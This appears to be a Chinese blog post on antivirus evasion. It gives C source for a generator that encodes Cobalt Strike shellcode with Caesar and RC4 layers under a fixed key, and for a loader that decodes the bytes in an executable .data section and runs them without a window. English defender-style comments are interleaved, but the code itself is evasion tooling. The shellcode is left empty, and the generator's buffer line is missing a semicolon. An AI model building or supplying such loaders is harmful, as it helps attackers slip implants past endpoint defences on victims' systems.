免杀——凯撒+RC4+Base64分离免杀

Shellcode生成器:

buf 是 Cobalt Strike(CS)生成的 Shellcode(下面的代码中已省略其内容)。注意:生成器里的 Base64 编码一步已被注释掉,加载器中也没有对应的解码调用,因此实际只使用了凯撒和 RC4 两层变换。

#include "Caesar.h"
#include "Base64.h"
#include "RC4.h"

/*
 * Encoder stage of the two-part sample: transforms the embedded buffer in
 * place (Caesar_Encryption first, then RC4_Crypt) and prints every resulting
 * byte to stdout as a "\xNN" escape.
 *
 * Analyst notes:
 *  - The RC4 key is the hard-coded literal "HelloWorld"; the loader listing on
 *    this page embeds the same literal, so the key travels with the sample.
 *  - Both layers are reversible transforms with fixed parameters. They change
 *    the byte pattern of the payload on disk, not what it does once decoded.
 *  - The Base64 step named in the page title is commented out here.
 */
int main()
{
	// Payload placeholder: empty in the published listing (the page text says
	// it holds the CS-generated shellcode).
	unsigned char buf[] = ""
        
	unsigned char* buf1;

	// sizeof(buf) - 1 drops the terminating NUL of the string literal.
	int nLength = sizeof(buf) - 1;
	int nNewLength = 0;

	// Static RC4 key; sizeof(key) - 1 below likewise excludes its NUL.
	unsigned char key[] = "HelloWorld";

	// Base64 (disabled by the author)
	//buf1 = Base64_Encode(buf, nLength, &nNewLength);

	// Caesar layer. buf1 aliases buf, so the transform happens in place and
	// there is no heap allocation (hence the free() left commented out below).
	// NOTE(review): the meaning of the arguments 7 and 9 is defined in
	// Caesar.h, which is not shown; the loader passes the same pair to
	// Caesar_Decryption.
	buf1 = buf;
	nNewLength = nLength;
	Caesar_Encryption(buf1, nNewLength, 7, 9);

	// RC4 layer, applied on top of the Caesar output.
	RC4_Crypt(buf1, nNewLength, key, sizeof(key) - 1);

	// Emit each byte as a literal backslash, 'x' and two hex digits.
	for (int i = 0; i < nNewLength; i++) {
		printf("\\x%02hx", buf1[i]);
	}

	//free(buf1);

	return 0;
}

 

加载器:

#include "Caesar.h"
#include "Base64.h"
#include "RC4.h"
#include <windows.h>

#include<Rpc.h>
#pragma comment(lib,"Rpcrt4.lib")


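// Marks the .data section readable, writable and executable (RWE); a section that is both writable and executable is visible in the PE section headers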
#pragma comment(linker, "/section:.data,RWE") 

//不显示窗口
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) 
#pragma comment(linker, "/INCREMENTAL:NO") 

/*
 * Loader stage: reverses the two encoding layers on the embedded buffer in
 * place (RC4_Crypt, then Caesar_Decryption - the inverse of the generator's
 * order) and then calls the buffer as a function.
 *
 * Triage notes for defenders:
 *  - Ciphertext, the key "HelloWorld" and the Caesar parameters (7, 9) are all
 *    embedded in this one binary, so the payload can be recovered offline
 *    without running the sample.
 *  - The linker directives above this function request an RWE .data section
 *    and a windowless subsystem with a console-style entry point; both show
 *    up in the PE headers.
 *  - After the two decode calls the payload sits in cleartext in process
 *    memory, so memory scanning and telemetry on execution from writable
 *    memory are not affected by the on-disk encoding.
 *  - Nothing in this function uses the Rpc.h / Rpcrt4.lib or Base64.h
 *    declarations pulled in above.
 */
int main()
{
    // Embedded payload; empty in the published listing.
    unsigned char buf[] = "";
	
	// sizeof(buf) - 1 drops the terminating NUL of the string literal.
	int nLength = sizeof(buf) - 1;
	int nNewLength = 0; // never read in this function
	
	// Same static key as the generator listing.
	unsigned char key[] = "HelloWorld";
	
	// Undo the outer (RC4) layer first...
	RC4_Crypt(buf, nLength, key, sizeof(key) - 1);
	
	// ...then the inner Caesar layer, with the generator's parameter pair.
	Caesar_Decryption(buf, nLength, 7, 9);
	
	// Casts the address of buf to a void(void) function pointer and calls it:
	// this is the data-to-code control transfer into the decoded bytes.
	((void(*)(void)) & buf)();

	// Reached only if the call above returns; shows a message box with empty
	// text and caption. NOTE(review): its purpose is not stated on the page.
	MessageBox(NULL, L"", L"", NULL);
}
 